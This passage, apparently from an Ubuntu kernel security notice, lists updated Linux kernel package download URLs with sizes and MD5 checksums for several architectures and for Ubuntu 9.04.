225400 72d96411968df5bb24b6c3409111f368\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   170442 65ea470d4661896774e2b17744bde9ea\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   199750 8e539809543d9b39931c2f9c0b608fd3\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   117952 9c0be00ccf310652a819d67e7fecbbbc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   139264 366dd0c02e403ef16c9da1ed940336bb\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    45374 7da2780fd97a9efdb2891c4cd3dbb611\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    46836 f96d04782ea762bb25c5b7fa13927742\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    51136 7eeb8c67107d09cca5d6ec53b4e0e640\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    60300 75caefd9be900faf4d7bd665e0a87e49\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    74182 2b8011cab437a41dc77b94b88e469222\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    87214 134a0a4d60e3a4d00ad71d8a38a00054\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    76092 ad9b456136a6e9bad3004f4e618dbcca\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    30230 83682f80fc1250d73ca5766262c8cf8e\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:     8488 6726b989a4df2541daca42af39d3a30b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    10030 4812e4833e0e4b3ca8e55079cd13d7ff\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    57440 d72f21d71d83cb31c79aa785a6c158a4\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    68744 0276d8aa4abc940cae72d4451ba65cdc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   101186 a3d4b7bea0440fcd1475bc292cece983\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   147822 372e114f4f7becea140fa5f33851d694\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  1565814 f4456b5f007c8e045f81e6de0ea25f99\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:  1514592 726d8053f7f1ddebe305118ee429a5c2\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    76668 a8fe769d492687b7b0e3ae95e1f28038\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    85974 0aa16271f113ef2bb68b07dd5e387800\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    12710 dac27b9a6eed7ad24e351060e8b2858f\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    14558 ec5ed3428e4b13a483d2ff19cff1ccfc\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   450810 4260e241f3f0cb6735739ccea2e70cda\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   505340 18d9294716dcdba902081c38ae39a676\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    83696 1ad62154f4910af7748784cc71c8ec39\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   108846 89b0ef22256773f155bd3d3868dde5cf\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    59576 50a041d5ddbcac27bae81c81a94584e6\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    71726 6be6331d6cec8cdcfb63a25a1d94d0c6\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    42442 750e7a8fbcf37e4f1e18d75952056d6d\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    91778 ae78c7f7ed5677eadcd2bbd04e12e624\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   587170 b8ce9c8d08ad3d2d4527e0ac285a2e85\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   171076 70d9840d79c7d897510c19812c849109\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    22356 684c85bec9286e7c3364cd7e7d20f056\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    46052 ca2fe0707c599d22956dfb3fc8abc724\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   152976 0d22680968c277f76a4001889af0431f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:  2135604 1b0f5a9cde179230c1166358c726305b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb\n      Size/MD5:   567336 5eec7e6775fe7fea52ca71b52f4de8c3\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb\n      Size/MD5:   565774 d5ff9b03b0d4b52aa4b462e9d3b536d9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb\n      Size/MD5: 14098838 83993d0248f289169a7afef405666fbc\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb\n      Size/MD5: 13833014 504a7d30fc2f014e930eb66bfa369485\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_sparc.deb\n      Size/MD5:   754240 83b808eeb2d8b4061ddf9d268e44171a\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   270056 98f38a0933d936d9aa8112fb6a8e2f79\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   190354 c4600cac5d626ddfa61d83a1ec671247\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   263026 a7df05507a97bf05575bfe742c1f7fa5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:  1386390 54a61a95d39edbcc445094f29c42f262\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   175414 69911cef4dd5a0d3d030a528ce8457b9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   122098 a0c2adf687a51bbe829adb835ecb71ee\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    40394 3c68e727d9f14a708d9ffc7f1bbe3aff\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    48058 19adf9ec3c25c920295662c53f3dda27\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:     8696 bb826a025cd7b1e9cd679c35c6126648\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    60508 4afc2631d8b1f65d02491233d5ccda2e\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   106836 b422f1235cb15f81230d03e9b3bdb4e1\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:  1002042 9b12e59032066f6fe401f01ee248cbda\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:     9518 b89c5ead0ec11c36566524fe1a6f544e\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:   391832 a484119637039fe91af1d8bbd8b320aa\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb\n      Size/MD5:    75926 8ad4b544689a8fee5dc03630477ca40c\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.diff.gz\n      Size/MD5:  7408064 bf077530cc28fc2c8ca7f9ebc05eed66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.dsc\n      Size/MD5:     3175 c72ff80106672ba9fe2b235ed9a26224\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-19.61_all.deb\n      Size/MD5:  3637802 0071d076650095f26837d5a5dedd2145\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19_2.6.28-19.61_all.deb\n      Size/MD5:  8702074 9443d9c2687b48b786cb25d72fb485a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-19.61_all.deb\n      Size/MD5: 57052608 2e0d28a7e74ae69fa47a6e6f250948a0\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   234610 23fec831e3f61298baa06636eceedb01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    44118 4a5fac5654db234e70a2e9eaccbf4285\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    43320 9952d12ff6a86714d06bfcf4bc9e4440\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    51118 7f9136aa3cb5b1041cf0551ddef98511\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    90086 f2df406121a67d4e0a47175ec1d71d9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    38016 d766f9f96987f7493d4fc61e591a8b33\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   521640 fe11a00a5429edfe67d479e8d825a39b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   125832 b4d69c3d7c5c847d8aa24d837db44486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    58072 68d73aff5009f5d5040372f2a46c49e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   312522 221708988c790d5e0fdbc477aaa81323\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:  3870958 c7c36beae2f7bf5930443ed3f6fddeb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_amd64.deb\n      Size/MD5:   690350 78eff761f3de3ca6b6a5d787b0913386\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_amd64.deb\n      Size/MD5:   689874 2f16c0b044e2f930a6de88d26682a404\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_amd64.deb\n      Size/MD5: 24343062 cfe2467fe5ca7affab65e8735c698df5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_amd64.deb\n      Size/MD5: 24339190 440cbba0ae0f1b19d0a68ee7499ca3ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_amd64.deb\n      Size/MD5: 10552344 058b8ed0770e4aa1df480e174f857778\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_amd64.deb\n      Size/MD5:   767088 f35f8e695c44c813079736c9c17bd5e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   215202 fcf462d6720a7273ee02c49782e83b13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   189510 9b19fb1abe93c181fe5fda8e72b8cd26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    29406 6288043ea717a7305dc8510cd2f421e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   274494 036b1935bbceccd31a7ed7e41f473f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:  1933878 13697cd495d281f48696d983541ffe7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   163480 8de928fc197b8b89ef1c7750a38b0d76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   194830 74b0f571685be779768609c16a414346\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   153010 3f9d7d19adf9afb4419a80ad04231009\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    36498 fd7232b8dcf13ff08280ca63caeae302\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:     5838 1cc67d1a6c420276e6f59db3ed9942c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    72150 a499b73933f58ec19e04b6428fb82185\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    22718 56724a5b7bcc91aff7be15700c0a82ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:     8874 a4f0e53f6b6d2cacf54c6a9ac9eab37c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    47442 b366ca0d5084bac531ddfbb50a9d51a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    15662 a0d315f845d9b5688dd17954a62f9d92\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:  1273634 e0047421d0cb50d5b39c75c97274697a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    47210 8ea312e79dd8c391c34b6b69cd257977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    72702 c6ffab61cbfcfdc2e32cbf60f1d4958a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:   126982 d6ede00cbf90e3b77fb8472fb3a9ee2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb\n      Size/MD5:    13472 d48c09cb3270f0372ba5adfbba467306\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   215872 98aa4e99386167781b23b5504cbc8591\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    46666 ede37f43ef40b34f9d77fc4640514651\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    41356 cb2e3f87cf5642a12835a48f2f7efa8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    47404 aeaca1593385350dc704f57aaf625b73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    86924 5ea2819a5c30ce4c89a2bce2bd4627aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    33574 2cb4c345fe2fb221897102c5014d2017\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   525756 f090c1ccf69ddb2820186927c85dcd98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   125642 86e82e5dd9d4f57969d66c72ec5f41eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    54880 6e13577469a187fece4e004a80668b48\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   301354 a8a087c11396b663d52e6fbb2fc419e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:  3744732 3bf841c6e53f9a9d6c352609cd21570b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_i386.deb\n      Size/MD5:   674722 ae9bf80ad2a72a2eab03a182d0b076ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_i386.deb\n      Size/MD5:   676386 672cfd17c45527cfcc4b74abad9f652d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_i386.deb\n      Size/MD5: 24657574 7a23546eec680913e2335da9389181da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_i386.deb\n      Size/MD5: 24781358 fd198c0b13ba70eadc83348ae87cf2f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_i386.deb\n      Size/MD5: 10250202 cdd81611c7865173650be382716316c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_i386.deb\n      Size/MD5:   767068 fbe363b42e813979a49a7444adface7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   218104 238d1fa355579b3e5c3b9a5f409ba412\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   174930 6c69f1ebda0371c7145ba0889931890b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    30066 f825580f63a3220d9ec048f5660309c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   262836 1ea6cea34f931354abe2c01aa8698f01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:  2110024 0ad4a3aab3642c6ff44b65e2155483d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   150224 04dcd6e520494576ac6e06aa863e73d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   184330 40e357d4f7c99b886a6b7a00170177a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   143594 38768a0d3f979c7cd662d6f2d23b4a68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    34576 dd9d68b4aa49cd96d1a4957ea1758668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:     5506 9e285ac21f1486b3ac73103b3e96fd40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    86008 578f19d536439c1b0aada7f86ccb7241\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    47638 fe2306b25d5f55bd6566a0c2291505dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:     8714 342c255e7f6fb6cc33b68075f0e21550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    44690 94d2c332f5947f4dce037570ce39b35e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    14778 0fe26ba732bfbe35baf944ae3b0e0bf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:  1446006 a016a4624c870f7359e89d436e94bfca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    44098 8a7b3746af4ee04b564c8bd8caf17027\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    69286 f10cde36cc89019b0a2cc3ca37dd1570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:   119542 b1a3003512dc0814ad58c46d29cea106\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb\n      Size/MD5:    12676 17546e9dd8ca873e2b2ab89c04274faf\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   215272 2da99e7865fed571480c1daf83362c2c\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    46658 d88e490bb0b9783884ee8c7d7268af02\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    40958 658c3596adb419ab460d1bec285c84ea\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    47310 20f31bf3e8154ce4e165a26ee05829b0\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    86524 220c27bce804ca2f28a07b1aa05a6724\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    33270 77f0d3419e8bce3aadab46745a89da47\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   523812 ca9ae4910b3b80db2b5f66df497b97bf\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   125274 df84493025631f40a26684e18fcbdcad\n    